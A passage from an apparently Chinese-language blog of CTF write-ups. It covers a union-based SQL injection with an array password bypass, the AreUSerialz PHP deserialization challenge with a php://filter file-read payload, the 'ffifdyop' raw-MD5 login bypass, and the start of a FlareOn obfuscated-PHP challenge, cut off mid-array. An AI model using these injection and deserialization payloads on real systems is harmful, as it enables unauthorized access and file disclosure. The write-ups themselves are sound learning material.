<p>3、mysqli_fetch_row() 函数从结果集中取得一行，并作为枚举数组返回。<br>4、md5加密后要与数组arr[2]弱类型比较。</p>
<p>5、值得注意的一点<code>$result = mysqli_query($con, $sql);</code>这里必须是有一个sql的查询语句，不然会直接退出（由下方判断得出）。</p>
<p>6、这里不是很能理解sql语句<code>$sql = &quot;select * from user where username = &#39;&quot;.$name.&quot;&#39;&quot;;</code>,拼接进去到底是什么样子的。询问了h3师傅。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210618.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220223170735"></p>
<p><strong><code>大爱h3</code></strong></p>
<p>尴尬，被教训了。我自己动手，设置的变量没有加<code>&quot;&quot;</code>,被骂的妥妥的，错了错了下次一定还敢哈哈哈哈。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210160.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220223171831"></p>
<h3 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h3><p>1、<code>name=ad&#39; union select 1,&#39;admin&#39;,NULL#&amp;pw[]=123</code></p>
<p>2、<code>name=ad&#39; union select 1,&#39;admin&#39;,&#39;加密后的md5&#39;#&amp;pw[]=任意待MD5加密的密码</code>（本人没有复现成功，没有具体的数据库也不能跟进查看）。</p>
<h2 id="网鼎杯-2020-青龙组-AreUSerialz"><a href="#网鼎杯-2020-青龙组-AreUSerialz" class="headerlink" title="[网鼎杯 2020 青龙组]AreUSerialz"></a>[网鼎杯 2020 青龙组]AreUSerialz</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML"> &lt;?php<br><br>include(&quot;flag.php&quot;);<br><br>highlight_file(__FILE__);<br><br>class FileHandler &#123;<br><br>    protected $op;<br>    protected $filename;<br>    protected $content;<br><br>    function __construct() &#123;<br>        $op = &quot;1&quot;;<br>        $filename = &quot;/tmp/tmpfile&quot;;<br>        $content = &quot;Hello World!&quot;;<br>        $this-&gt;process();<br>    &#125;<br><br>    public function process() &#123;<br>        if($this-&gt;op == &quot;1&quot;) &#123;<br>            $this-&gt;write();<br>        &#125; else if($this-&gt;op == &quot;2&quot;) &#123;<br>            $res = $this-&gt;read();<br>            $this-&gt;output($res);<br>        &#125; else &#123;<br>            $this-&gt;output(&quot;Bad Hacker!&quot;);<br>        &#125;<br>    &#125;<br><br>    private function write() &#123;<br>        if(isset($this-&gt;filename) &amp;&amp; isset($this-&gt;content)) &#123;<br>            if(strlen((string)$this-&gt;content) &gt; 100) &#123;<br>                $this-&gt;output(&quot;Too long!&quot;);<br>                die();<br>            &#125;<br>            $res = file_put_contents($this-&gt;filename, $this-&gt;content);<br>            if($res) $this-&gt;output(&quot;Successful!&quot;);<br>            else $this-&gt;output(&quot;Failed!&quot;);<br>        &#125; else &#123;<br>            $this-&gt;output(&quot;Failed!&quot;);<br>        &#125;<br>    &#125;<br><br>    private function read() &#123;<br>        $res = &quot;&quot;;<br>        if(isset($this-&gt;filename)) &#123;<br>            $res = file_get_contents($this-&gt;filename);<br>        &#125;<br>        return $res;<br>    &#125;<br><br>    private function output($s) &#123;<br>        echo &quot;[Result]: &lt;br&gt;&quot;;<br>        echo $s;<br>    &#125;<br><br>    function __destruct() &#123;<br>        if($this-&gt;op === &quot;2&quot;)<br>            $this-&gt;op = &quot;1&quot;;<br>        $this-&gt;content = &quot;&quot;;<br>        $this-&gt;process();<br>    &#125;<br><br>&#125;<br><br>function is_valid($s) &#123;<br>    for($i = 0; $i &lt; strlen($s); $i++)<br>        if(!(ord($s[$i]) &gt;= 32 &amp;&amp; ord($s[$i]) &lt;= 125))<br>            return false;<br>    return true;<br>&#125;<br><br>if(isset($_GET&#123;&#x27;str&#x27;&#125;)) &#123;<br><br>    $str = (string)$_GET[&#x27;str&#x27;];<br>    if(is_valid($str)) &#123;<br>        $obj = unserialize($str);<br>    &#125;<br><br>&#125;<br><br></code></pre></td></tr></table></figure>

<h3 id="分析代码"><a href="#分析代码" class="headerlink" title="分析代码"></a>分析代码</h3><p>一眼看到<code>unserialize</code>（大体就是考查反序列化了），然后有一个判断。<code>is_valid($str)</code>,上网找了半天，结果这是一个自建函数。emmm…无语啦。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">is_valid</span>(<span class="hljs-params"><span class="hljs-variable">$s</span></span>) </span>&#123;<br>    <span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> &lt; <span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$s</span>); <span class="hljs-variable">$i</span>++)<br>        <span class="hljs-keyword">if</span>(!(<span class="hljs-title function_ invoke__">ord</span>(<span class="hljs-variable">$s</span>[<span class="hljs-variable">$i</span>]) &gt;= <span class="hljs-number">32</span> &amp;&amp; <span class="hljs-title function_ invoke__">ord</span>(<span class="hljs-variable">$s</span>[<span class="hljs-variable">$i</span>]) &lt;= <span class="hljs-number">125</span>))<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>&#125;<br><span class="hljs-comment">#其功能就是限制输入的字符长度为32-125（转化为ascii后）</span><br></code></pre></td></tr></table></figure>

<p>然后想到魔法函数的调用。这里直接引用h3师傅的文章。copy过来。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs awk">__destruct()：<span class="hljs-regexp">//</span>析构函数当对象被销毁时会被自动调用<br>__wakeup(): <span class="hljs-regexp">//u</span>nserialize()时会被自动调用<br>__invoke(): <span class="hljs-regexp">//</span>当尝试以调用函数的方法调用一个对象时，会被自动调用<br>__call(): <span class="hljs-regexp">//</span>在对象上下文中调用不可访问的方法时触发<br>__callStatci(): <span class="hljs-regexp">//</span>在静态上下文中调用不可访问的方法时触发<br>__get(): <span class="hljs-regexp">//</span>用于从不可访问的属性读取数据<br>__set(): <span class="hljs-regexp">//</span>用于将数据写入不可访问的属性<br>__isset(): <span class="hljs-regexp">//</span>在不可访问的属性上调用isset()或empty()触发<br>__unset(): <span class="hljs-regexp">//</span>在不可访问的属性上使用unset()时触发<br>__toString(): <span class="hljs-regexp">//</span>把类当作字符串使用时触发<br>__construct(): <span class="hljs-regexp">//</span>构造函数，当对象new的时候会自动调用，但在unserialize()时不会自动调用<br>__sleep(): <span class="hljs-regexp">//</span>serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在，该方法会被优先调用<br></code></pre></td></tr></table></figure>

<p>这里就可以直接看看<code>_destruct()</code>干了什么。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php">    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;op === <span class="hljs-string">&quot;2&quot;</span>)<br>            <span class="hljs-variable language_">$this</span>-&gt;op = <span class="hljs-string">&quot;1&quot;</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;content = <span class="hljs-string">&quot;&quot;</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">process</span>();<br>    &#125;<br><span class="hljs-comment">#op初始值为1</span><br></code></pre></td></tr></table></figure>

<p>继续跟<code>process()</code>函数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">process</span>(<span class="hljs-params"></span>) </span>&#123;<br>     <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;op == <span class="hljs-string">&quot;1&quot;</span>) &#123;<br>         <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">write</span>();<br>     &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;op == <span class="hljs-string">&quot;2&quot;</span>) &#123;<br>         <span class="hljs-variable">$res</span> = <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">read</span>();<br>         <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">output</span>(<span class="hljs-variable">$res</span>);<br>     &#125; <span class="hljs-keyword">else</span> &#123;<br>         <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">output</span>(<span class="hljs-string">&quot;Bad Hacker!&quot;</span>);<br>     &#125;<br> &#125;<br></code></pre></td></tr></table></figure>

<p>很显然需要进入<code>read()</code>函数。这里<code>output</code>，会将返回结果输出。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">read</span>(<span class="hljs-params"></span>) </span>&#123;<br>    <span class="hljs-variable">$res</span> = <span class="hljs-string">&quot;&quot;</span>;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable language_">$this</span>-&gt;filename)) &#123;<br>        <span class="hljs-variable">$res</span> = <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-variable language_">$this</span>-&gt;filename);<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$res</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>很显然这里就可以用php:&#x2F;&#x2F;filter伪协议读取文件。</p>
<h3 id="流程"><a href="#流程" class="headerlink" title="流程"></a>流程</h3><p>1、需要在进入<code>process</code>之前将op的值改为2。</p>
<p>2、构造filenaem&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210434.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220223160637"></p>
<p>这里不知道什么原因。搜了一下wp。看wp的时候发现自己的伪协议写错了。emmm…手动添加<code>//</code>，并且手动改变wp。<code>55</code>–<code>57</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210005.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220223160814"></p>
<h3 id="poc-1"><a href="#poc-1" class="headerlink" title="poc"></a>poc</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">O</span>:<span class="hljs-number">11</span>:<span class="hljs-string">&quot;FileHandler&quot;</span>:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">2</span>:<span class="hljs-string">&quot;op&quot;</span>;i:<span class="hljs-number">2</span>;s:<span class="hljs-number">8</span>:<span class="hljs-string">&quot;filename&quot;</span>;s:<span class="hljs-number">57</span>:<span class="hljs-string">&quot;php://filter/read=convert.base64-encode/resource=flag.php&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<h3 id="Base64解码"><a href="#Base64解码" class="headerlink" title="Base64解码"></a>Base64解码</h3><p>结束。</p>
<h2 id="SWPUCTF-2016-Web7"><a href="#SWPUCTF-2016-Web7" class="headerlink" title="[SWPUCTF 2016]Web7"></a>[SWPUCTF 2016]Web7</h2><p>这题相对来说就比较简单。简单记录一下。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/QQ%E6%88%AA%E5%9B%BE20220218183715.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220218183715"></p>
<p>如何绕过呢？百度一瞧。</p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210449.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220218183842"></p>
<p><strong>师傅已经讲得很详细了，总而言之就是当注入的pass&#x3D;ffifdyop时，ffifdyop经过md5加密后变成 ‘or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 被返回， ‘ \ ‘后面的3个字符连同’ \ ‘算一个字符，比如’  \xc9 ‘，所以上述一共16个字符。函数md5($pass,true)返回为true。</strong></p>
<p><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210428.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220218184141"></p>
<p>查看源码 MD5简单绕过，然后依旧MD5简单绕过。<br>结束。<br><img src="https://cdn.jsdelivr.net/gh/zx-creat/myblog@master/img/202203261210962.png" srcset="/img/loading.gif" lazyload alt="QQ截图20220218184328"></p>
<h2 id="FlareOn1-Javascrap"><a href="#FlareOn1-Javascrap" class="headerlink" title="[FlareOn1]Javascrap"></a>[FlareOn1]Javascrap</h2><p>给了压缩包直接下载一下。winhex查看图片。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$terms</span>=<span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;M&quot;</span>, <span class="hljs-string">&quot;Z&quot;</span>, <span class="hljs-string">&quot;]&quot;</span>, <span class="hljs-string">&quot;p&quot;</span>, <span class="hljs-string">&quot;\\&quot;</span>, <span class="hljs-string">&quot;w&quot;</span>, <span class="hljs-string">&quot;f&quot;</span>, <span class="hljs-string">&quot;1&quot;</span>, <span class="hljs-string">&quot;v&quot;</span>, <span class="hljs-string">&quot;&lt;&quot;</span>, <span class="hljs-string">&quot;a&quot;</span>, <span class="hljs-string">&quot;Q&quot;</span>, <span class="hljs-string">&quot;z&quot;</span>, <span class="hljs-string">&quot; &quot;</span>, <span class="hljs-string">&quot;s&quot;</span>, <span class="hljs-string">&quot;m&quot;</span>, <span class="hljs-string">&quot;+&quot;</span>, <span class="hljs-string">&quot;E&quot;</span>, <span class="hljs-string">&quot;D&quot;</span>, <span class="hljs-string">&quot;g&quot;</span>, <span class="hljs-string">&quot;W&quot;</span>, <span class="hljs-string">&quot;\&quot;&quot;</span>, <span class="hljs-string">&quot;q&quot;</span>, <span class="hljs-string">&quot;y&quot;</span>, <span class="hljs-string">&quot;T&quot;</span>, <span class="hljs-string">&quot;V&quot;</span>, <span class="hljs-string">&quot;n&quot;</span>, <span class="hljs-string">&quot;S&quot;</span>, <span class="hljs-string">&quot;X&quot;</span>, <span class="hljs-string">&quot;)&quot;</span>, <span class="hljs-string">&quot;9&quot;</span>, <span class="hljs-string">&quot;C&quot;</span>, <span class="hljs-string">&quot;P&quot;</span>, <span class="hljs-string">&quot;r&quot;</span>, <span class="hljs-string">&quot;&amp;&quot;</span>, <span class="hljs-string">&quot;\&#x27;&quot;</span>, <span class="hljs-string">&quot;!&quot;</span>, <span class="hljs-string">&quot;x&quot;</span>, <span class="hljs-string">&quot;G&quot;</span>, <span class="hljs-string">&quot;:&quot;</span>, <span class="hljs-string">&quot;2&quot;</span>, <span class="hljs-string">&quot;~&quot;</span>, <span class="hljs-string">&quot;O&quot;</span>, <span class="hljs-string">&quot;h&quot;</span>, <span class="hljs-string">&quot;u&quot;</span>, <span class="hljs-string">&quot;U&quot;</span>, <span class="hljs-string">&quot;@&quot;</span>, <span class="hljs-string">&quot;;&quot;</span>, <span class="hljs-string">&quot;H&quot;</span>, <span class="hljs-string">&quot;3&quot;</span>, <span class="hljs-string">&quot;F&quot;</span>, <span class="hljs-string">&quot;6&quot;</span>, <span class="hljs-string">&quot;b&quot;</span>, <span class="hljs-string">&quot;L&quot;</span>, <span class="hljs-string">&quot;&gt;&quot;</span>, <span class="hljs-string">&quot;^&quot;</span>, <span class="hljs-string">&quot;,&quot;</span>, <span class="hljs-string">&quot;.&quot;</span>, <span class="hljs-string">&quot;l&quot;</span>, <span class="hljs-string">&quot;$&quot;</span>, <span class="hljs-string">&quot;d&quot;</span>, <span class="hljs-string">&quot;`&quot;</span>, <span class="hljs-string">&quot;%&quot;</span>, <span class="hljs-string">&quot;N&quot;</span>, <span class="hljs-string">&quot;*&quot;</span>, <span class="hljs-string">&quot;[&quot;</span>, <span class="hljs-string">&quot;0&quot;</span>, <span class="hljs-string">&quot;&#125;&quot;</span>, <span class="hljs-string">&quot;J&quot;</span>, <span class="hljs-string">&quot;-&quot;</span>, <span class="hljs-string">&quot;5&quot;</span>, <span class="hljs-string">&quot;_&quot;</span>, <span class="hljs-string">&quot;A&quot;</span>, <span class="hljs-string">&quot;=&quot;</span>, <span class="hljs-string">&quot;&#123;&quot;</span>, <span class="hljs-string">&quot;k&quot;</span>, <span class="hljs-string">&quot;o&quot;</span>, <span class="hljs-string">&quot;7&quot;</span>, <span class="hljs-string">&quot;#&quot;</span>, <span class="hljs-string">&quot;i&quot;</span>, <span class="hljs-string">&quot;I&quot;</span>, <span class="hljs-string">&quot;Y&quot;</span>, <span class="hljs-string">&quot;(&quot;</span>, <span class="hljs-string">&quot;j&quot;</span>, <span class="hljs-string">&quot;/&quot;</span>, <span class="hljs-string">&quot;?&quot;</span>, <span class="hljs-string">&quot;K&quot;</span>, <span class="hljs-string">&quot;c&quot;</span>, <span class="hljs-string">&quot;B&quot;</span>, <span class="hljs-string">&quot;t&quot;</span>, <span class="hljs-string">&quot;R&quot;</span>, <span class="hljs-string">&quot;4&quot;</span>, <span class="hljs-string">&quot;8&quot;</span>, <span class="hljs-string">&quot;e&quot;</span>, <span class="hljs-string">&quot;|&quot;</span>);<br><span class="hljs-variable">$order</span>=<span class="hljs-keyword">array</span>(<span class="hljs-number">59</span>, <span class="hljs-number">71</span>, <span class="hljs-number">73</span>, <span class="hljs-number">13</span>, <span class="hljs-number">35</span>, <span class="hljs-number">10</span>, <span class="hljs-number">20</span>, <span class="hljs-number">81</span>, <span class="hljs-number">76</span>, <span class="hljs-number">10</span>, <span class="hljs-number">28</span>, <span class="hljs-number">63</span>, <span class="hljs-number">12</span>, <span class="hljs-number">1</span>, <span class="hljs-number">28</span>, <span class="hljs-number">11</span>, <span class="hljs-number">76</span>, <span class="hljs-number">68</span>, <span class="hljs-number">50</span>, <span class="hljs-number">30</span>, <span class="hljs-number">11</span>, <span class="hljs-number">24</span>, <span class="hljs-number">7</span>, <span class="hljs-number">63</span>, <span class="hljs-number">45</span>, <span class="hljs-number">20</span>, <span class="hljs-number">23</span>, <span class="hljs-number">68</span>, <span class="hljs-number">87</span>, <span class="hljs-number">42</span>, <span class="hljs-number">24</span>, <span class="hljs-number">60</span>, <span class="hljs-number">87</span>, <span class="hljs-number">63</span>, <span class="hljs-number">18</span>, <span class="hljs-number">58</span>, <span class="hljs-number">87</span>, <span class="hljs-number">63</span>, <span class="hljs-number">18</span>, <span class="hljs-number">58</span>, <span class="hljs-number">87</span>, <span class="hljs-number">63</span>, <span class="hljs-number">83</span>, <span class="hljs-number">43</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">90</span>, <span class="hljs-number">38</span>, <span class="hljs-number">28</span>, <span class="hljs-number">18</span>, <span class="hljs-number">19</span>, <span class="hljs-number">66</span>, <span class="hljs-number">28</span>, <span class="hljs-number">18</span>, <span class="hljs-number">17</span>, <span class="hljs-number">37</span>, <span class="hljs-number">63</span>, <span class="hljs-number">58</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">83</span>, <span class="hljs-number">43</span>, <span class="hljs-number">87</span>, <span class="hljs-number">42</span>, <span class="hljs-number">24</span>, <span class="hljs-number">60</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">87</span>, <span class="hljs-number">66</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">66</span>, <span class="hljs-number">63</span>, <span class="hljs-number">50</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">17</span>, <span class="hljs-number">1</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">45</span>, <span class="hljs-number">66</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">40</span>, <span class="hljs-number">11</span>, <span class="hljs-number">25</span>, <span class="hljs-number">5</span>, <span class="hljs-number">70</span>, <span class="hljs-number">63</span>, <span class="hljs-number">7</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">12</span>, <span class="hljs-number">1</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">81</span>, <span class="hljs-number">37</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">12</span>, <span class="hljs-number">63</span>, <span class="hljs-number">25</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">83</span>, <span class="hljs-number">63</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">87</span>, <span class="hljs-number">23</span>, <span class="hljs-number">28</span>, <span class="hljs-number">18</span>, <span class="hljs-number">75</span>, <span class="hljs-number">49</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">49</span>, <span class="hljs-number">0</span>, <span class="hljs-number">50</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">18</span>, <span class="hljs-number">50</span>, <span class="hljs-number">87</span>, <span class="hljs-number">42</span>, <span class="hljs-number">18</span>, <span class="hljs-number">90</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">81</span>, <span class="hljs-number">40</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">40</span>, <span class="hljs-number">11</span>, <span class="hljs-number">7</span>, <span class="hljs-number">5</span>, <span class="hljs-number">70</span>, <span class="hljs-number">63</span>, <span class="hljs-number">7</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">12</span>, <span class="hljs-number">68</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">81</span>, <span class="hljs-number">7</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">66</span>, <span class="hljs-number">63</span>, <span class="hljs-number">50</span>, <span class="hljs-number">5</span>, <span class="hljs-number">40</span>, <span class="hljs-number">63</span>, <span class="hljs-number">25</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">24</span>, <span class="hljs-number">63</span>, <span class="hljs-number">87</span>, <span class="hljs-number">63</span>, <span class="hljs-number">12</span>, <span class="hljs-number">68</span>, <span class="hljs-number">87</span>, <span class="hljs-number">0</span>, <span class="hljs-number">24</span>, <span class="hljs-number">17</span>, <span class="hljs-number">37</span>, <span class="hljs-number">28</span>, <span class="hljs-number">18</span>, <span class="hljs-number">17</span>, <span class="hljs-number">37</span>, <span class="hljs-number">0</span>, <span class="hljs-number">50</span>, <span class="hljs-number">5</span>, <span class="hljs-number">40</span>, <span class="hljs-number">42</span>, <span class="hljs-number">50</span>, <span class="hljs-number">5</span>, <span class="hljs-number">49</span>, <span class="hljs-number">42</span>, <span class="hljs-number">25</span>, <span class="hljs-number">5</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">50</span>, <span class="hljs-number">5</span>, <span class="hljs-number">70</span>, <span class="hljs-number">42</span>, <span class="hljs-number">25</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">63</span>, <span class="hljs-number">75</span>, <span class="hljs-number">1</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">1</span>, <span class="hljs-number">17</span>, <span class="hljs-number">80</span>, <span class="hljs-number">58</span>, <span class="hljs-number">66</span>, <span class="hljs-number">3</span>, <span class="hljs-number">86</span>, <span class="hljs-number">27</span>, <span class="hljs-number">88</span>, <span class="hljs-number">77</span>, <span class="hljs-number">80</span>, <span class="hljs-number">38</span>, <span class="hljs-number">25</span>, <span class="hljs-number">40</span>, <span class="hljs-number">81</span>, <span class="hljs-number">20</span>, <span class="hljs-number">5</span>, <span class="hljs-number">76</span>, <span class="hljs-number">81</span>, <span class="hljs-number">15</span>, <span class="hljs-number">50</span>, <span class="hljs-number">12</span>, <span class="hljs-number">1</span>, <span class="hljs-number">24</span>, <span class="hljs-number">81</span>, <span class="hljs-number">66</span>, <span class="hljs-number">28</span>, <span class="hljs-number">40</span>, <span class="hljs-number">90</span>, <span class="hljs-number">58</span>, <span class="hljs-number">81</span>, <span class="hljs-number">40</span>, <span class="hljs-number">30</span>, <span class="hljs-number">75</span>, <span class="hljs-number">1</span>, <span class="hljs-number">27</span>, <span class="hljs-number">19</span>, <span class="hljs-number">75</span>, <span class="hljs-number">28</span>, <span class="hljs-number">7</span>, <span class="hljs-number">88</span>, <span class="hljs-number">32</span>, <span class="hljs-number">45</span>, <span class="hljs-number">7</span>, <span class="hljs-number">90</span>, <span class="hljs-number">52</span>, <span class="hljs-number">80</span>, <span class="hljs-number">58</span>, <span class="hljs-number">5</span>, <span class="hljs-number">70</span>, <span class="hljs-number">63</span>, <span class="hljs-number">7</span>, <span class="hljs-number">5</span>, <span class="hljs-number">66</span>, <span class="hljs-number">42</span>, <span class="hljs-number">25</span>, <span class="hljs-number">37</span>, <span class="hljs-number">91</span>, <span class="hljs-number">0</span>, <span class="hljs-number">12</span>, <span class="hljs-number">50</span>, <span class="hljs-number">87</span>, <span class="hljs-number">63</span>, <span class="hljs-number">83</span>, <span class="hljs-number">43</span>, <span class="hljs-number">87</span>, <span class="hljs-number">93</span>, <span class="hljs-number">18</span>, <span class="hljs-number">90</span>, <span class="hljs-number">38</span>, <span class="hljs-number">28</span>, <span class="hljs-number">48</span>, <span class="hljs-number">19</span>, <span class="hljs-number">7</span>, <span class="hljs-number">63</span>, <span class="hljs-number">50</span>, <span class="hljs-number">5</span>, <span class="hljs-number">37</span>, <span class="hljs-number">0</span>, <span class="hljs-number">24</span>, <span class="hljs-number">1</span>, <span class="hljs-number">87</span>, <span class="hljs-number">0</span>, <span class="hljs-number">24</span>, <span class="hljs-number">72</span>, <span class="hljs-number">66</span>, <span 